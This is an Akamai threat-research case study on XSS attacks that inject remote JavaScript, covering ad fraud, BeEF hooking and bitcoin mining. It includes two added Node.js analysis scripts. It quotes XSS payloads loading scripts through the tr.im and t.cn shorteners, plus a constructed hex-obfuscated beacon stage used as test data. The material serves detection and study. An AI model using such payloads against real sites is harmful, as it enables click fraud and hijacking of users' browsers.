
AKAMAI CASE STUDY

An Analysis of XSS Exploitation through Remote Resource Injection

1.0 / Overview / To gain clarity on the nature of XSS attacks, Akamai's Threat Research
team analyzed a week of cross-site scripting (XSS) alert triggers from our Cloud Security
Intelligence (CSI) platform. The goal was to identify vulnerable vectors and the specific
techniques employed in remote resource injection exploitation attempts, as distinct from
simple probing requests. Specifically, we analyzed XSS attacks that attempted to embed remote
JavaScript resources into pages. These attacks contrast with benign, proof-of-concept
attempts that call alert(), prompt(), or confirm() to prove that an XSS payload was
executed by the browser's JavaScript engine; such probes do not attempt to exploit the end user.

2.0 / Scope of Analysis / Earlier this year, we analyzed seven days of JavaScript injection
attempts. We cast a wide net to identify requests that included references to remote JavaScript
resources, and then we dug deeper to identify the intent of the JavaScript code.
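As an added example (it is not Akamai's CSI code, and the sample payloads and the example-domain hosts in it are constructed), the following Node.js script does on a handful of alert payloads what the analysis describes: it separates proof-of-concept probes (alert/prompt/confirm) from attempts to include remote JavaScript, and tallies the referenced hosts so they can be enriched with hosting and reputation data. The SHORTENERS list is an assumption, seeded from the two shortener hosts shown later in Figure 6.

```javascript
// Added example (not Akamai's CSI code): sort raw XSS alert payloads into
// proof-of-concept probes versus remote-resource injection attempts, and tally
// the remote hosts referenced. Sample payloads and the example.* hosts are
// constructed; SHORTENERS is an assumed analyst-maintained list seeded from Figure 6.

const PROBE_RE = /\b(alert|prompt|confirm)\s*\(/i;

// Matches an absolute or protocol-relative src= value, with or without an enclosing
// tag. Group 1 is the tag name when one is present; a bare src=" attribute injection
// (as in the first Figure 6 payload) carries no tag in the payload itself.
const SRC_RE = /(?:<(\w+)[^>]*?)?\bsrc\s*=\s*["']?\s*((?:https?:)?\/\/[^"'\s>]+)/gi;

const SHORTENERS = new Set(['tr.im', 't.cn']);

function decodePayload(raw) {
  // Alert logs usually carry the raw query string; undo one layer of URL encoding.
  try {
    return decodeURIComponent(raw.replace(/\+/g, ' '));
  } catch (e) {
    return raw; // malformed %-sequence: analyze the raw text instead
  }
}

function extractRemoteRefs(payload) {
  const refs = [];
  for (const m of decodePayload(payload).matchAll(SRC_RE)) {
    const ref = m[2].startsWith('//') ? 'https:' + m[2] : m[2];
    try {
      refs.push({ url: new URL(ref), tag: (m[1] || '').toLowerCase() });
    } catch (e) {
      // unparsable URL: not a usable remote reference
    }
  }
  return refs;
}

function classify(payload) {
  const refs = extractRemoteRefs(payload);
  // A <script> tag, or a tagless attribute injection, counts as JavaScript inclusion;
  // a remote src on another tag (img, iframe, ...) is tracked separately.
  const scripts = refs.filter(r => r.tag === '' || r.tag === 'script');
  if (scripts.length > 0) {
    return {
      kind: 'remote-inclusion',
      hosts: scripts.map(r => r.url.hostname),
      viaShortener: scripts.some(r => SHORTENERS.has(r.url.hostname)),
    };
  }
  if (refs.length > 0) {
    return { kind: 'remote-other', hosts: refs.map(r => r.url.hostname), viaShortener: false };
  }
  const kind = PROBE_RE.test(decodePayload(payload)) ? 'probe' : 'other';
  return { kind, hosts: [], viaShortener: false };
}

// Constructed sample; payloads 3 and 4 are the two shortener payloads from Figure 6.
const SAMPLE_PAYLOADS = [
  'q=<script>alert(1)</script>',
  'q=%22%3E%3Cscript%3Eprompt(document.domain)%3C%2Fscript%3E',
  'param=" src="https://tr.im/YrYDX"></script>',
  'param=<script src=http://t.cn/RG9I7lu></script>',
  'name=<script src="//cdn.example-analytics.net/track.js"></script>',
  'q=<img src="http://tracker.example.com/p.gif">',
  'page=2',
];

function summarize(payloads) {
  const counts = { probe: 0, 'remote-inclusion': 0, 'remote-other': 0, other: 0 };
  const hostTally = new Map();
  let viaShortener = 0;
  for (const p of payloads) {
    const c = classify(p);
    counts[c.kind] += 1;
    if (c.viaShortener) viaShortener += 1;
    for (const h of c.hosts) hostTally.set(h, (hostTally.get(h) || 0) + 1);
  }
  // Hosts by how often they were referenced: the list an analyst would then
  // enrich with hosting country and reputation data.
  const hosts = [...hostTally.entries()].sort((a, b) => b[1] - a[1]);
  return { counts, viaShortener, hosts };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(summarize(SAMPLE_PAYLOADS), null, 2));
}
```

Only one layer of URL decoding is undone; double-encoded payloads, which scanners also send, would need decodePayload() applied until the text stops changing. The tag filter is deliberately permissive about tagless src= attributes because the payload alone cannot show which element the attribute lands in.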

3.0 / Findings / Our analysis found that the vast majority (98%) of remote JavaScript code
references were related to legitimate JavaScript frameworks, such as those used by:

• Ad serving technologies
• User experience or user interface frameworks
• User or site analytics
• XSS probing (scanners, scanning-service vendors, etc.) through remote JavaScript
resource inclusion

Illegitimate JavaScript injections comprised the remaining 2%. Below is the full list of
countries in which the servers hosting the malicious code were located, in order of
prevalence from greatest to least:

• China
• Hungary
• Ukraine
• Russia
• Montenegro
• Mexico
• US
• Brazil
• India

The three primary malicious purposes, in order of prevalence, were illegitimate ad injection,
XSS exploitation frameworks, and bitcoin mining.


3.1 / Illegitimate Ad Injection / Click fraud and other deceptive advertising schemes
use illegitimate ad injection, as shown in Figure 1.

Figure 1: This click-fraud JavaScript loads invisible advertisements

3.2 / XSS Exploitation Frameworks / The Browser Exploitation Framework (BeEF), shown
in Figure 2, and XSS Platform, which can phish for user credentials (Figure 3), are
used to hook and control victims' web browsers.

Figure 2: A BeEF injection attempt


Figure 3: An XSS platform phishing pop-up screen seeks to steal user credentials

3.3 / Bitcoin Mining / The unsuspecting user is redirected to a bitcoin mining domain,
and then the client is remotely monitored, as shown in Figure 4.

Figure 4: A URL shortener redirects to a bitcoin mining domain

The domain shown in Figure 5 (www.spartacusminer.com) hosts a bitcoin mining service.

Figure 5: Spartacus is a bitcoin mining service


The injections often used URL shortener services such as https://tr.im/ or http://t.cn/ to
obscure the location of the malicious JavaScript files. Additionally, abusing a legitimate
URL shortener makes it more difficult for client-reputation vendors to blacklist the
domain, because the shortener's domain also carries legitimate traffic. Figure 6 shows two
example payloads:

param=" src="https://tr.im/YrYDX"></script>
param=<script src=http://t.cn/RG9I7lu></script>

Figure 6: XSS attacks that utilized URL shortener services

It was common to see multi-phase loading of the malicious resource, in which one script
loads another script, which may in turn load a third. On average the chain was two embeds
deep (script A loads script B). This is partly a byproduct of the URL shortener services,
which use HTTP 302 redirects to send the browser to the next step in the request chain.
Figure 7 shows an example in which document.write() calls redirect the victim to a
click-fraud page that displays hidden Windows Media resources.

Figure 7: document.write() calls redirect the victim to a click-fraud site


In all of the cases, the malicious code was packed and obfuscated, using multiple layers of
tricks to defeat casual reading. Figure 8 shows an example that uses JavaScript hex escaping
(\xHH sequences inside string literals) to hide its strings. Once decoded, the script forces
the web browser to request an image from a web service every few milliseconds, the finest
interval JavaScript timers allow.

Figure 8: Obfuscated JavaScript file
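The following added example (not Akamai's code, and not transcribed from Figures 7 or 8) replays such a chain offline, covering both the multi-phase loading described above and the hex-escape obfuscation of the final stage. A constructed table of HTTP responses stands in for the shortener's 302, script A's document.write() of script B, and a final stage whose strings are hidden with \xHH escapes. Apart from the tr.im host from Figure 6, every host, path and script body in it is made up for the example: walkChain() follows the chain and counts redirects and embeds, and analyzeFinalStage() decodes the escapes and pulls out the image-beacon URL and timer interval.

```javascript
// Added example (not Akamai's code): replay a multi-phase loading chain offline and
// strip the hex-escape obfuscation of its final stage. FAKE_WEB stands in for the
// HTTP responses; every host, path and script body is constructed for the example,
// apart from the tr.im shortener host taken from Figure 6.

const FAKE_WEB = {
  // Stage 0: the shortener answers with an HTTP 302 to the real first-stage script.
  'https://tr.im/YrYDX': { status: 302, location: 'http://stage1.example.net/a.js' },
  // Stage 1: script A document.write()s a <script> tag that pulls in script B.
  'http://stage1.example.net/a.js': {
    status: 200,
    body: String.raw`document.write("<script src=\"http://stage2.example.net/b.js\"></scr"+"ipt>");`,
  },
  // Stage 2: the payload proper, with its strings hidden behind \xHH escapes
  // ("http://beacon.example.org/i.gif" and "src").
  'http://stage2.example.net/b.js': {
    status: 200,
    body: String.raw`var _0x=["\x68\x74\x74\x70\x3a\x2f\x2f\x62\x65\x61\x63\x6f\x6e\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x6f\x72\x67\x2f\x69\x2e\x67\x69\x66","\x73\x72\x63"];setInterval(function(){var i=new Image();i[_0x[1]]=_0x[0]+"?r="+Math.random();},4);`,
  },
};

const SHORTENERS = new Set(['tr.im', 't.cn']);

// A src= value inside a document.write() call, allowing for the \" quoting
// used inside the written string.
const WRITE_SRC_RE = /document\.write\s*\([\s\S]*?\bsrc\s*=\s*\\?["']?\s*((?:https?:)?\/\/[^"'\\\s>]+)/i;

function fetchSim(url) {
  const res = FAKE_WEB[url];
  if (!res) throw new Error('no recorded response for ' + url);
  return res;
}

// Follow redirects and document.write() embeds until a stage loads nothing further.
function walkChain(startUrl, maxHops = 10) {
  const hops = [];
  let redirects = 0;
  let embeds = 0;
  let url = startUrl;
  while (hops.length < maxHops) {
    const res = fetchSim(url);
    hops.push({ url, status: res.status, shortener: SHORTENERS.has(new URL(url).hostname) });
    if (res.status === 301 || res.status === 302 || res.status === 307) {
      redirects += 1;
      url = new URL(res.location, url).href; // Location may be relative to the shortener
      continue;
    }
    const m = WRITE_SRC_RE.exec(res.body);
    if (!m) return { hops, redirects, embeds, finalUrl: url, finalBody: res.body };
    embeds += 1;
    url = new URL(m[1].startsWith('//') ? 'https:' + m[1] : m[1]).href;
  }
  throw new Error('chain exceeded ' + maxHops + ' hops');
}

// Replace \xHH and \uHHHH escapes with the characters they encode.
function decodeJsEscapes(src) {
  return src
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Decode the final stage and pull out the beacon URL and the timer interval.
function analyzeFinalStage(body) {
  const decoded = decodeJsEscapes(body);
  const strings = [...decoded.matchAll(/"([^"\\]*)"/g)].map(m => m[1]);
  const period = decoded.match(/setInterval\(\s*function[\s\S]*?\}\s*,\s*(\d+)\s*\)/);
  return {
    decoded,
    beacon: strings.find(s => /^https?:\/\//.test(s)) || null,
    imageBeacon: /new\s+Image\s*\(/.test(decoded),
    periodMs: period ? Number(period[1]) : null,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  const chain = walkChain('https://tr.im/YrYDX');
  console.log(chain.hops);
  console.log(analyzeFinalStage(chain.finalBody));
}
```

Against live samples, fetchSim() would be replaced by a real fetch that never follows redirects automatically, so that each 302 is recorded as its own hop; the maxHops guard is there because a redirect loop is a cheap way to stall an analysis script.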

4.0 / Conclusion and XSS Mitigation / There is a whole world of XSS taking place
that goes beyond proof-of-concept pop-up boxes. Malicious actors are leveraging XSS
vulnerabilities for nefarious purposes including click/ad fraud, session stealing, and
compromising users' browsers. Organizations can help mitigate the abuse of XSS
vulnerabilities in their web applications by conducting vulnerability scans and
deploying a web application firewall in front of their web sites. End users benefit from
running the latest version of their web browser, since many include built-in XSS protections,
and can consider installing a security plugin such as NoScript.

About Akamai® As the global leader in Content Delivery Network (CDN) services, Akamai makes the Internet fast, reliable and secure for its customers. The company's advanced web
performance, mobile performance, cloud security and media delivery solutions are revolutionizing how businesses optimize consumer, enterprise and entertainment experiences for
any device, anywhere. To learn how Akamai solutions and its team of Internet experts are helping businesses move faster forward, please visit www.akamai.com or blogs.akamai.com,
and follow @Akamai on Twitter.

Akamai is headquartered in Cambridge, Massachusetts in the United States with operations in more than 57 offices around the world. Our services and renowned customer care are
designed to enable businesses to provide an unparalleled Internet experience for their customers worldwide. Addresses, phone numbers and contact information for all locations are
listed on www.akamai.com/locations.

©2016 Akamai Technologies, Inc. All Rights Reserved. Reproduction in whole or in part in any form or medium without express written permission is prohibited. Akamai and the
Akamai wave logo are registered trademarks. Other trademarks contained herein are the property of their respective owners. Akamai believes that the information in this publication
is accurate as of its publication date; such information is subject to change without notice. Published 08/16.
